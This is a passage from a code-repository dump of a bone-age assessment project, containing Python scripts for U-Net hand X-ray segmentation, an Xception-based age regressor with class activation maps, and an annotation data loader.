FLAGS.pixel\ngpu = FLAGS.gpu\n\nexperiment_name = \"{}_dice{}_pixel{}_GPU{}\".format(FLAGS.exp, dice_ratio, pixel_ratio, gpu)\nimg_out_dir = \"{}/segmentation_results\".format(experiment_name)\nmodel_out_dir = \"{}/model\".format(experiment_name)\nmetrics_out_dir = \"{}/metrics\".format(experiment_name)\ninference_dir = \"{}/inferenced_result\".format(experiment_name)\nsegmented_all = \"{}/segmented_all\".format(experiment_name)\nif not os.path.isdir(inference_dir):\n os.makedirs(inference_dir)\nif not os.path.isdir(segmented_all):\n os.makedirs(segmented_all)\n\n\nprint \"[x] building 
models on GPU: {}\".format(gpu)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n\n# create model 0\nis_train = tf.placeholder(tf.bool)\nprint \"[x] building Model 0\"\ntf.set_random_seed(1377)\nx_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_0\")\ny_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_0\")\ny_prob0, conv9_feature0 = unet(x_0, is_train, n_filters=32, name=\"u-net_0\")\ndice_coef_loss_0 = dice_coef_loss(y_prob0, y_0)\npixelwise_cross_entropy_0 = pixelwise_cross_entropy(y_prob0, y_0)\nloss_0 = dice_ratio * dice_coef_loss_0 + pixel_ratio * pixelwise_cross_entropy_0\n\nprint \"[x] building Model 1\"\ntf.set_random_seed(7988)\nx_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_1\")\ny_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_1\")\ny_prob1, conv9_feature1 = unet(x_1, is_train, n_filters=32, name=\"u-net_1\")\ndice_coef_loss_1 = dice_coef_loss(y_prob1, y_1)\npixelwise_cross_entropy_1 = pixelwise_cross_entropy(y_prob1, y_1)\nloss_1 = dice_ratio * dice_coef_loss_1 + pixel_ratio * pixelwise_cross_entropy_1\n\n\nprint \"[x] restore model ...\"\nsaver = tf.train.Saver()\nmodel_file = tf.train.latest_checkpoint(model_out_dir)\nsaver.restore(sess, model_file)\n\nprint \"[x] loading data ...\"\nannotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=True)\nprint \"[x] load annotated data ...\"\nannotated_x, annotated_y, annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=False)\nprint \"[x] load unannotated data ...\"\nunannotated_x, unannotated_ids = utils_data.load_unannotated_data_np(data_dir=RSNA_GT_NP_UNANNOTATED, annotated_ids=annotated_ids)\nprint \"[x] loaded annotated data: {}, unannotated data: {}\".format(annotated_x.shape[0], unannotated_x.shape[0])\n\n# Segment unannotated data\ndef segment_unannotated_image(sess, input_tensor, output_tensor, is_training, image_data):\n images = []\n for k in range(batch_size):\n images.append(image_data)\n images = np.array(images, dtype=np.float32)\n [segmentation] = sess.run([output_tensor], feed_dict={input_tensor: images, is_training: False})\n return np.squeeze(segmentation[0], axis=2)\n\n\ndef resize_to_ori(image_data, image_data_id, data_dir=RSNA_DATA_DIR):\n img_ori = cv2.imread(data_dir+\"/{}.png\".format(image_data_id), cv2.IMREAD_GRAYSCALE)\n if img_ori.shape[0] > img_ori.shape[1]:\n pad = (img_ori.shape[0] - img_ori.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img_ori.shape[1] - img_ori.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n padded = np.pad(img_ori, pad_tuple, mode=\"constant\")\n resized_img = cv2.resize(image_data, (padded.shape[1], padded.shape[0]), interpolation=cv2.INTER_AREA)\n return resized_img, padded\n\n\ndef crop_hand_bin(img_bin):\n try:\n smooth_w, smooth_h = img_bin.shape[0]//30, img_bin.shape[1]//30\n min_row = np.min(np.where(img_bin==1)[0])\n max_row = np.max(np.where(img_bin==1)[0])\n min_col = np.min(np.where(img_bin==1)[1])\n max_col = np.max(np.where(img_bin==1)[1])\n min_row = np.clip(min_row-smooth_w, 0, min_row)\n max_row = np.clip(max_row+smooth_w, max_row, img_bin.shape[0]-1)\n min_col = np.clip(min_col-smooth_h, 0, min_col)\n max_col = np.clip(max_col+smooth_h, max_col, img_bin.shape[1]-1)\n return 
min_row, max_row, min_col, max_col\n    except ValueError:\n        # np.min / np.max raise ValueError when the mask is empty (all zeros)\n        print \"exception: empty mask, falling back to the full image\"\n        return 0, img_bin.shape[0], 0, img_bin.shape[1]\n\n\ndef pad_img_2_rect(img):\n    if img.shape[0] > img.shape[1]:\n        pad = (img.shape[0] - img.shape[1]) // 2\n        pad_tuple = ((0, 0), (pad, pad))\n    else:\n        pad = (img.shape[1] - img.shape[0]) // 2\n        pad_tuple = ((pad, pad), (0, 0))\n    padded = np.pad(img, pad_tuple, mode=\"constant\")\n    return padded\n\n# inference with model 0\nfor i in range(unannotated_x.shape[0]):\n    image_id = unannotated_ids[i]\n    print \"inference {}\".format(image_id)\n    segmentated_data_0 = segment_unannotated_image(sess, x_0, y_prob0, is_train, unannotated_x[i])\n    resized_segmentated_data_0, padded_ori_img = resize_to_ori(segmentated_data_0, image_id, data_dir=RSNA_DATA_DIR)\n    img_seg_0 = np.multiply(resized_segmentated_data_0, padded_ori_img)\n    plt.imsave(fname=inference_dir+\"/{}_x.png\".format(image_id), arr=np.squeeze(unannotated_x[i], axis=2), cmap=\"gray\")\n    plt.imsave(fname=inference_dir+\"/{}_y.png\".format(image_id), arr=segmentated_data_0, cmap=\"gray\")\n\n    plt.imsave(fname=segmented_all+\"/{}_ori.png\".format(image_id), arr=padded_ori_img, cmap=\"gray\")\n    plt.imsave(fname=segmented_all+\"/{}_bin.png\".format(image_id), arr=resized_segmentated_data_0, cmap=\"gray\")\n    plt.imsave(fname=segmented_all+\"/{}_seg.png\".format(image_id), arr=img_seg_0, cmap=\"gray\")\n\n    r_min, r_max, c_min, c_max = crop_hand_bin(np.asarray(resized_segmentated_data_0, dtype=np.int32))\n    plt.imsave(fname=segmented_all+\"/{}_crop_ori.png\".format(image_id),\n               arr=padded_ori_img[r_min: r_max, c_min: c_max], cmap=\"gray\")\n    plt.imsave(fname=segmented_all + \"/{}_crop_bin.png\".format(image_id),\n               arr=resized_segmentated_data_0[r_min: r_max, c_min: c_max], cmap=\"gray\")\n    plt.imsave(fname=segmented_all + \"/{}_crop_seg.png\".format(image_id),\n               arr=img_seg_0[r_min: r_max, c_min: c_max], cmap=\"gray\")\n\n\n# Segment annotated data\nprint \"segment annotated data\"\nannotated_x_files = glob(RSNA_GT+\"/*_ori.png\")\nannotated_y_files = glob(RSNA_GT+\"/*_bin.png\")\nfor annotated_x_file in annotated_x_files:\n    image_id = annotated_x_file[annotated_x_file.rfind(\"/\")+1: annotated_x_file.find(\"_\")]\n    print \"segment {}\".format(image_id)\n    img_x = cv2.imread(annotated_x_file, cv2.IMREAD_GRAYSCALE)\n    img_x = pad_img_2_rect(img_x)\n    annotated_y_file = RSNA_GT + \"/{}_bin.png\".format(image_id)\n    img_y = cv2.imread(annotated_y_file, cv2.IMREAD_GRAYSCALE)\n    img_y = pad_img_2_rect(img_y)\n    img_y = img_y / 255.\n    img_seg = np.multiply(img_x, img_y)\n    plt.imsave(fname=segmented_all+\"/{}_ori.png\".format(image_id), arr=img_x, cmap=\"gray\")\n    plt.imsave(fname=segmented_all+\"/{}_bin.png\".format(image_id), arr=img_y, cmap=\"gray\")\n    plt.imsave(fname=segmented_all+\"/{}_seg.png\".format(image_id), arr=img_seg, cmap=\"gray\")\n\n    r_min, r_max, c_min, c_max = crop_hand_bin(np.asarray(img_y, dtype=np.int32))\n    plt.imsave(fname=segmented_all + \"/{}_crop_ori.png\".format(image_id),\n               arr=img_x[r_min: r_max, c_min: c_max], cmap=\"gray\")\n    plt.imsave(fname=segmented_all + \"/{}_crop_bin.png\".format(image_id),\n               arr=img_y[r_min: r_max, c_min: c_max], cmap=\"gray\")\n    plt.imsave(fname=segmented_all + \"/{}_crop_seg.png\".format(image_id),\n               arr=img_seg[r_min: r_max, c_min: c_max], cmap=\"gray\")\n\n# Segment new annotated data\nprint \"segment new annotated data\"\nannotated_y_files = glob(RSNA_GT_NEW+\"/*_bin.png\")\nfor annotated_y_file in tqdm(annotated_y_files):\n    image_id = 
annotated_y_file[annotated_y_file.rfind(\"/\")+1: annotated_y_file.find(\"_\")]\n print \"segment {}\".format(image_id)\n img_y = cv2.imread(annotated_y_file, cv2.IMREAD_GRAYSCALE)\n img_y = pad_img_2_rect(img_y)\n img_y[img_y > 0] = 255\n img_y = img_y / 255.\n annotated_x_file = RSNA_GT_NEW + \"/{}.png\".format(image_id)\n img_x = cv2.imread(annotated_x_file, cv2.IMREAD_GRAYSCALE)\n img_x = pad_img_2_rect(img_x)\n img_seg = np.multiply(img_x, img_y)\n plt.imsave(fname=segmented_all + \"/{}_ori.png\".format(image_id), arr=img_x, cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_bin.png\".format(image_id), arr=img_y, cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_seg.png\".format(image_id), arr=img_seg, cmap=\"gray\")\n\n r_min, r_max, c_min, c_max = crop_hand_bin(np.asarray(img_y, dtype=np.int32))\n plt.imsave(fname=segmented_all + \"/{}_crop_ori.png\".format(image_id),\n arr=img_x[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_bin.png\".format(image_id),\n arr=img_y[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_seg.png\".format(image_id),\n arr=img_seg[r_min: r_max, c_min: c_max], cmap=\"gray\")" }, { "alpha_fraction": 0.63188236951828, "alphanum_fraction": 0.6491784453392029, "avg_line_length": 41.28658676147461, "blob_id": "540271dcb19b495f60cfa268262d94a2d9f6d7cb", "content_id": "7bc8c58b4e2b5822e96eae2574a6d1b54c1fc787", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6938, "license_type": "no_license", "max_line_length": 117, "num_lines": 164, "path": "/paced_transfer/step4_cam.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport sys\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras import optimizers\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import LambdaCallback\nfrom keras.models import Model\nfrom keras.layers import GlobalAveragePooling2D, Dense\nfrom tqdm import tqdm\nimport keras\n\nfrom utils_training import _set_trainable_layers, _pprint\nfrom utils_data import load_sex_ids, load_data, save_obj, load_data_sex\nfrom utils_metric import regression_metric\nfrom config import *\n\n\ndef _build_regressor(img_size=299, num_gpu=1, start_layer=-1, learning_rate=1E-4):\n input_shape = (img_size, img_size, 3)\n base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n if start_layer == -1:\n _set_trainable_layers(base_model, len(base_model.layers))\n else:\n _set_trainable_layers(base_model, start_layer)\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n print \"[x] compile model on %d GPU(s)\" % num_gpu\n\n model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n model.summary(print_fn=_pprint)\n return model, base_model\n\n\ndef predict_on_weights(out_base, weights):\n gap = np.average(out_base, axis=(0, 1))\n logit = np.dot(gap, np.squeeze(weights))\n return 1 / (1 + np.e ** (-logit))\n\n\ndef getCAM(image, bone_age, 
feature_maps, weights, img_size):\n predict = predict_on_weights(feature_maps, weights)\n # Weighted Feature Map\n cam = (predict - 0.5) * np.matmul(feature_maps, weights)\n # Normalize\n cam = (cam - cam.min()) / (cam.max() - cam.min())\n # Resize as image size\n cam_resize = cv2.resize(cam, (img_size, img_size))\n # Format as CV_8UC1 (as applyColorMap required)\n cam_resize = 255 * cam_resize\n cam_resize = cam_resize.astype(np.uint8)\n # Get Heatmap\n heatmap = cv2.applyColorMap(cam_resize, cv2.COLORMAP_JET)\n # Zero out\n heatmap[np.where(cam_resize <= 100)] = 0\n\n print \"image shape = {}, heatmap shape = {}, cam shape = {}\".format(image.shape, heatmap.shape, cam_resize.shape)\n print \"image dtype = {}, heatmap dtype = {}, cam dtype = {}\".format(image.dtype, heatmap.dtype, cam_resize.dtype)\n out = cv2.addWeighted(src1=image, alpha=0.8, src2=heatmap, beta=0.4, gamma=0)\n out = cv2.resize(out, dsize=(400, 400))\n\n text = 'bone age %.2fm, predict %.2fm' % (bone_age*SCALE, predict*SCALE)\n cv2.putText(out, text, (100, 40), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5,\n color=(123, 222, 238), thickness=2, lineType=cv2.LINE_AA)\n return out, predict\n\n\ndef train(img_size, start_layer, learning_rate, n_epoch, data_x, data_y):\n model, base_model = _build_regressor(img_size, 1, start_layer, learning_rate)\n\n weights_history = []\n get_weights_cb = LambdaCallback(on_batch_end=lambda batch,\n logs: weights_history.append(model.layers[-1].get_weights()[0]))\n\n data_gen = ImageDataGenerator(rotation_range=180, zoom_range=0.1, horizontal_flip=True)\n data_gen.fit(data_x)\n history = model.fit_generator(data_gen.flow(data_x, data_y, batch_size=batch_size),\n validation_data=(data_x[:1000], data_y[:1000]),\n workers=4,\n callbacks=[get_weights_cb],\n use_multiprocessing=True,\n epochs=n_epoch)\n\n save_obj(weights_history, name=model_out_dir+\"/weights.pkl\")\n base_model.save(model_out_dir+\"/base_model.h5\")\n model.save(model_out_dir+\"/model.h5\")\n\n return base_model, weights_history\n\n\ndef inference(data_ids, data_y, base_model, weights_history, img_size):\n for i in tqdm(range(len(data_ids))):\n _id = data_ids[i]\n img = cv2.imread(RSNA_SEG_ENHANCE + \"/{}_seg.png\".format(_id), cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n ori_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = np.array(img, dtype=np.float32)\n img = xception_input(img)\n int_image = np.array(ori_img, dtype=np.uint8)\n bone_age = data_y[i]\n\n out_base = base_model.predict(np.expand_dims(img, axis=0))[0]\n cam, prediction = getCAM(int_image, bone_age, out_base, weights_history[-1], img_size)\n distance = np.abs(prediction - bone_age)*SCALE\n plt.imsave(fname=inference_out_dir+\"/{}_{}_cam.png\".format(distance, _id), arr=cam)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"CAM\")\n parser.add_argument('--img_size', type=int, help=\"image size\", default=299)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--start_layer', type=int, help=\"start_layer\", default=0)\n parser.add_argument('--n_epoch', type=int, help=\"training epochs\", default=1)\n FLAGS = parser.parse_args()\n\n exp_name = FLAGS.exp\n gpu_id = FLAGS.gpu_id\n 
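# note: getCAM above follows the class-activation-map recipe of Zhou et al. (CVPR 2016):\n    # GAP features f_k weighted by the dense-layer weights w_k give M(x, y) = sum_k w_k * f_k(x, y),\n    # which getCAM additionally scales by (predict - 0.5) and min-max normalizes before overlaying.\n    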
img_size = FLAGS.img_size\n batch_size = FLAGS.batch_size\n sex = FLAGS.sex\n start_layer = FLAGS.start_layer\n n_epoch = FLAGS.n_epoch\n\n model_out_dir = \"E{}_S{}_IMG_{}_START_{}/model\".format(exp_name, sex, img_size, start_layer)\n inference_out_dir = \"E{}_S{}_IMG_{}_START_{}/cam\".format(exp_name, sex, img_size, start_layer)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n if not os.path.isdir(inference_out_dir):\n os.makedirs(inference_out_dir)\n\n print \"[x] building models on GPU {}\".format(gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n learning_rate = 1E-5\n\n print \"[x] load data ...\"\n data_ids = load_sex_ids(sex)\n data_x, data_y = load_data_sex(sex, img_size, xception_input)\n print \"[x] loaded data_x {}, data_y {} data\".format(data_x.shape, data_y.shape)\n\n base_model, weights_history = train(img_size, start_layer, learning_rate, n_epoch, data_x, data_y)\n inference(data_ids, data_y, base_model, weights_history, img_size)\n\n\n\n" }, { "alpha_fraction": 0.5861470103263855, "alphanum_fraction": 0.6056337952613831, "avg_line_length": 36.565216064453125, "blob_id": "db9ab20ab010900ce4dca0f68c56b83eacd35e0b", "content_id": "d910f0ddfd4e960e138829be97f376650475065b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5183, "license_type": "no_license", "max_line_length": 115, "num_lines": 138, "path": "/al_segmentation/utils_registration_data_loader.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport xml.etree.ElementTree as ET\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\nfrom glob import glob\nfrom tqdm import tqdm\nfrom config import *\n\n\nMID, CARPAL, THUMB = \"middle\", \"carpal\", \"thumb\"\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n\"\"\"\ndef pad_image(img):\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n padded = np.pad(img, pad_tuple, mode=\"constant\")\n return padded, pad_tuple\n\"\"\"\n\n\ndef parser_xml(xml_file):\n dom_tree = ET.parse(xml_file)\n objs = dom_tree.findall(\"object\")\n assert len(objs) == 3\n img_h = float(dom_tree.find(\"size\").find(\"width\").text)\n img_w = float(dom_tree.find(\"size\").find(\"height\").text)\n\n info = {}\n for obj in objs:\n name = obj.find(\"name\").text\n bbox = obj.find(\"bndbox\")\n # x is col, y is row\n xmin = float(bbox.find(\"xmin\").text)\n xmax = float(bbox.find(\"xmax\").text)\n ymin = float(bbox.find(\"ymin\").text)\n ymax = float(bbox.find(\"ymax\").text)\n x_center = (xmax+xmin)/2\n y_center = (ymax+ymin)/2\n row_ratio = y_center / img_w\n col_ratio = x_center / img_h\n info[name] = (row_ratio, col_ratio)\n return info\n\n\ndef resize_img(img, new_size=(256, 256)):\n return cv2.resize(img, new_size, interpolation=cv2.INTER_AREA)\n\n\ndef load_test_data(data_image_files_dir, annotation_ids, pattern=\"_crop_seg\", img_size=299):\n data_image_files = glob(data_image_files_dir + \"/*{}*\".format(pattern))\n data_img = []\n data_ids = []\n for data_image_file in tqdm(data_image_files):\n data_id = data_image_file[data_image_file.rfind(\"/\") + 1: data_image_file.find(pattern)]\n if data_id not in 
annotation_ids:\n img_ori = cv2.imread(data_image_file, cv2.IMREAD_GRAYSCALE)\n img = resize_img(img_ori, (img_size, img_size))\n img = img / 255.\n img = (img - np.mean(img)) / np.std(img)\n data_img.append(img)\n data_ids.append(data_id)\n\n data_img = np.expand_dims(np.array(data_img, dtype=np.float32), axis=3)\n return data_img, data_ids\n\n\ndef load_training_data(data_image_files_dir, annotation_dir, pattern=\"_crop_seg\", img_size=299):\n data_annotation_files = glob(annotation_dir + \"/*{}*\".format(pattern))\n data_img = []\n data_label = []\n annotation_ids = []\n for data_annotation_file in tqdm(data_annotation_files):\n data_id = data_annotation_file[data_annotation_file.rfind(\"/\")+1: data_annotation_file.find(pattern)]\n # print \"read file %s\" % data_annotation_file\n data_image_file = data_image_files_dir + \"/{0}{1}.png\".format(data_id, pattern)\n img_ori = cv2.imread(data_image_file, cv2.IMREAD_GRAYSCALE)\n xml_info = parser_xml(data_annotation_file)\n\n img = resize_img(img_ori, (img_size, img_size))\n label = np.array([xml_info[MID][0], xml_info[MID][1],\n xml_info[THUMB][0], xml_info[THUMB][1],\n xml_info[CARPAL][0], xml_info[CARPAL][1]], dtype=np.float32)\n img = img / 255.\n img = (img - np.mean(img)) / np.std(img)\n\n data_img.append(img)\n data_label.append(label)\n annotation_ids.append(data_id)\n\n data_img = np.expand_dims(np.array(data_img, dtype=np.float32), axis=3)\n data_label = np.array(data_label, dtype=np.float32)\n return data_img, data_label, annotation_ids\n\n\ndef visual_image(img, coord, visual_dir, output_name, is_train=False, radius=1):\n if is_train:\n plt.imsave(fname=visual_dir + \"/{}_ori.png\".format(output_name), arr=img, cmap=\"gray\")\n img = cv2.imread(visual_dir + \"/{}_ori.png\".format(output_name), cv2.IMREAD_COLOR)\n img_w = img.shape[0]\n img_h = img.shape[1]\n middle_finger_y, middle_finger_x = int(coord[0] * img_w), int(coord[1] * img_h)\n cv2.circle(img, (middle_finger_x, middle_finger_y), radius, RED, -1)\n\n thumb_finger_y, thumb_finger_x = int(coord[2] * img_w), int(coord[3] * img_h)\n cv2.circle(img, (thumb_finger_x, thumb_finger_y), radius, GREEN, -1)\n\n carpal_y, carpal_x = int(coord[4] * img_w), int(coord[5] * img_h)\n cv2.circle(img, (carpal_x, carpal_y), radius, BLUE, -1)\n\n plt.imsave(fname=visual_dir + \"/{}_annotate.png\".format(output_name), arr=img)\n\n\ndef visualize_data(visual_dir=\"tmp\"):\n if not os.path.isdir(visual_dir):\n os.makedirs(visual_dir)\n data_dir = \"./interactive_segmentation_dice1.0_pixel1.0_GPU0/segmented_all/\"\n data_imgs, data_labels, _ = load_training_data(data_dir, annotation_dir=RSNA_GT_KEY_POINT, pattern=\"_crop_seg\")\n print \"load image %d\" % data_imgs.shape[0]\n for i in range(data_imgs.shape[0]):\n img = data_imgs[i]\n label = data_labels[i]\n\n plt.imsave(fname=visual_dir+\"/{}_img.png\".format(i), arr=np.squeeze(img), cmap=\"gray\")\n img = cv2.imread(visual_dir+\"/{}_img.png\".format(i), cv2.IMREAD_COLOR)\n\n visual_image(img, label, visual_dir, output_name=str(i))\n\nif __name__ == \"__main__\":\n visualize_data()" }, { "alpha_fraction": 0.5166277885437012, "alphanum_fraction": 0.5797841548919678, "avg_line_length": 45.013423919677734, "blob_id": "fa17ce26410d2bae0948519b3fe6e554659bb4d5", "content_id": "5c33b7879a8ae1fdb430d9bac2b66af6d63e46c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6856, "license_type": "no_license", "max_line_length": 84, "num_lines": 149, "path": "/al_segmentation/tf_model_unet.py", 
"repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import slim\n\nfrom config import *\nfrom tf_ops import *\n\n# generate Model for U-Net\ndef unet(x, is_train, n_filters, name=\"unet_v2\"):\n k = 3\n s = 2\n tensor_shape = x.get_shape().as_list()\n img_ch = 1\n out_ch = 1\n assert len(tensor_shape) == 4 # batch, d, h, w, ch\n assert tensor_shape[-1] == out_ch\n\n if DEBUG_MODEL:\n print \"x shape = {}\".format(x.get_shape())\n\n with tf.variable_scope(name) as scope:\n conv1 = conv2d(x, n_filters, k=k, name=\"conv1_0\")\n bn1_0 = BatchNorm(name=\"bn1_0\")\n conv1 = bn1_0(conv1, train=is_train)\n conv1 = relu(conv1)\n if DEBUG_MODEL: print \"conv1_0 shape = {}\".format(conv1.get_shape())\n conv1 = conv2d(conv1, n_filters, k=k, name=\"conv1_1\")\n bn1_1 = BatchNorm(name=\"bn1_1\")\n conv1 = bn1_1(conv1, train=is_train)\n conv1 = relu(conv1)\n if DEBUG_MODEL: print \"conv1_1 shape = {}\".format(conv1.get_shape())\n pool1 = maxpool2d(conv1, k=2, s=s)\n if DEBUG_MODEL: print \"pool1 shape = {}\".format(pool1.get_shape())\n\n conv2 = conv2d(pool1, 2*n_filters, k=k, name=\"conv2_0\")\n bn2_0 = BatchNorm(name=\"bn2_0\")\n conv2 = bn2_0(conv2, train=is_train)\n conv2 = relu(conv2)\n if DEBUG_MODEL: print \"conv2_0 shape = {}\".format(conv2.get_shape())\n conv2 = conv2d(conv2, 2*n_filters, k=k, name=\"conv2_1\")\n bn2_1 = BatchNorm(name=\"bn2_1\")\n conv2 = bn2_1(conv2, train=is_train)\n conv2 = relu(conv2)\n if DEBUG_MODEL: print \"conv2_1 shape = {}\".format(conv2.get_shape())\n pool2 = maxpool2d(conv2, k=2, s=s)\n if DEBUG_MODEL: print \"pool2 shape = {}\".format(pool2.get_shape())\n\n conv3 = conv2d(pool2, 4*n_filters, k=k, name=\"conv3_0\")\n bn3_0 = BatchNorm(name=\"bn3_0\")\n conv3 = bn3_0(conv3, train=is_train)\n conv3 = relu(conv3)\n if DEBUG_MODEL: print \"conv3_0 shape = {}\".format(conv3.get_shape())\n conv3 = conv2d(conv3, 4*n_filters, k=k, name=\"conv3_1\")\n bn3_1 = BatchNorm(name=\"bn3_1\")\n conv3 = bn3_1(conv3, train=is_train)\n conv3 = relu(conv3)\n if DEBUG_MODEL: print \"conv3_1 shape = {}\".format(conv3.get_shape())\n pool3 = maxpool2d(conv3, k=2, s=s)\n if DEBUG_MODEL: print \"pool3 shape = {}\".format(pool3.get_shape())\n\n conv4 = conv2d(pool3, 8*n_filters, k=k, name=\"conv4_0\")\n bn4_0 = BatchNorm(name=\"bn4_0\")\n conv4 = bn4_0(conv4, train=is_train)\n conv4 = relu(conv4)\n if DEBUG_MODEL: print \"conv4_0 shape = {}\".format(conv4.get_shape())\n conv4 = conv2d(conv4, 8*n_filters, k=k, name=\"conv4_1\")\n bn4_1 = BatchNorm(name=\"bn4_1\")\n conv4 = bn4_1(conv4, train=is_train)\n conv4 = relu(conv4)\n if DEBUG_MODEL: print \"conv4_1 shape = {}\".format(conv4.get_shape())\n pool4 = maxpool2d(conv4, k=2, s=s)\n if DEBUG_MODEL: print \"pool4 shape = {}\".format(pool4.get_shape())\n\n conv5 = conv2d(pool4, 16*n_filters, k=k, name=\"conv5_0\")\n bn5_0 = BatchNorm(name=\"bn5_0\")\n conv5 = bn5_0(conv5, train=is_train)\n conv5 = relu(conv5)\n if DEBUG_MODEL: print \"conv5_0 shape = {}\".format(conv5.get_shape())\n conv5 = conv2d(conv5, 16*n_filters, k=k, name=\"conv5_1\")\n bn5_1 = BatchNorm(name=\"bn5_1\")\n conv5 = bn5_1(conv5, train=is_train)\n conv5 = relu(conv5)\n if DEBUG_MODEL: print \"conv5_1 shape = {}\".format(conv5.get_shape())\n\n up1 = upsampling2d(conv5, 16*n_filters, k=k, s=2, name=\"up1\")\n if DEBUG_MODEL: print \"up1 before concat shape = {}\".format(up1.get_shape())\n up1 = tf.concat([up1, conv4], axis=3)\n if DEBUG_MODEL: print \"up1 concat shape = 
{}\".format(up1.get_shape())\n conv6 = conv2d(up1, 8*n_filters, k=k, name=\"conv6_0\")\n bn6_0 = BatchNorm(name=\"bn6_0\")\n conv6 = bn6_0(conv6, train=is_train)\n conv6 = relu(conv6)\n if DEBUG_MODEL: print \"conv6_0 shape = {}\".format(conv6.get_shape())\n conv6 = conv2d(conv6, 8*n_filters, k=k, name=\"conv6_1\")\n bn6_1 = BatchNorm(name=\"bn6_1\")\n conv6 = bn6_1(conv6, train=is_train)\n conv6 = relu(conv6)\n if DEBUG_MODEL: print \"conv6_1 shape = {}\".format(conv6.get_shape())\n\n up2 = upsampling2d(conv6, 8*n_filters, k=k, s=2, name=\"up2\")\n if DEBUG_MODEL: print \"up2 before concat shape = {}\".format(up2.get_shape())\n up2 = tf.concat([up2, conv3], axis=3)\n if DEBUG_MODEL: print \"up2 concat shape = {}\".format(up2.get_shape())\n conv7 = conv2d(up2, 4*n_filters, k=k, name=\"conv7_0\")\n bn7_0 = BatchNorm(name=\"bn7_0\")\n conv7 = bn7_0(conv7, train=is_train)\n conv7 = relu(conv7)\n if DEBUG_MODEL: print \"conv7_0 shape = {}\".format(conv7.get_shape())\n conv7 = conv2d(conv7, 4*n_filters, k=k, name=\"conv7_1\")\n bn7_1 = BatchNorm(name=\"bn7_1\")\n conv7 = bn7_1(conv7, train=is_train)\n conv7 = relu(conv7)\n if DEBUG_MODEL: print \"conv7_1 shape = {}\".format(conv7.get_shape())\n\n up3 = upsampling2d(conv7, 4*n_filters, k=k, s=2, name=\"up3\")\n if DEBUG_MODEL: print \"up3 before concat shape = {}\".format(up3.get_shape())\n up3 = tf.concat([up3, conv2], axis=3)\n if DEBUG_MODEL: print \"up3 concat shape = {}\".format(up3.get_shape())\n conv8 = conv2d(up3, 2*n_filters, k=k, name=\"conv8_0\")\n bn8_0 = BatchNorm(name=\"bn8_0\")\n conv8 = bn8_0(conv8, train=is_train)\n conv8 = relu(conv8)\n if DEBUG_MODEL: print \"conv8_0 shape = {}\".format(conv8.get_shape())\n conv8 = conv2d(conv8, 2*n_filters, k=k, name=\"conv8_1\")\n bn8_1 = BatchNorm(name=\"bn8_1\")\n conv8 = bn8_1(conv8, train=is_train)\n conv8 = relu(conv8)\n if DEBUG_MODEL: print 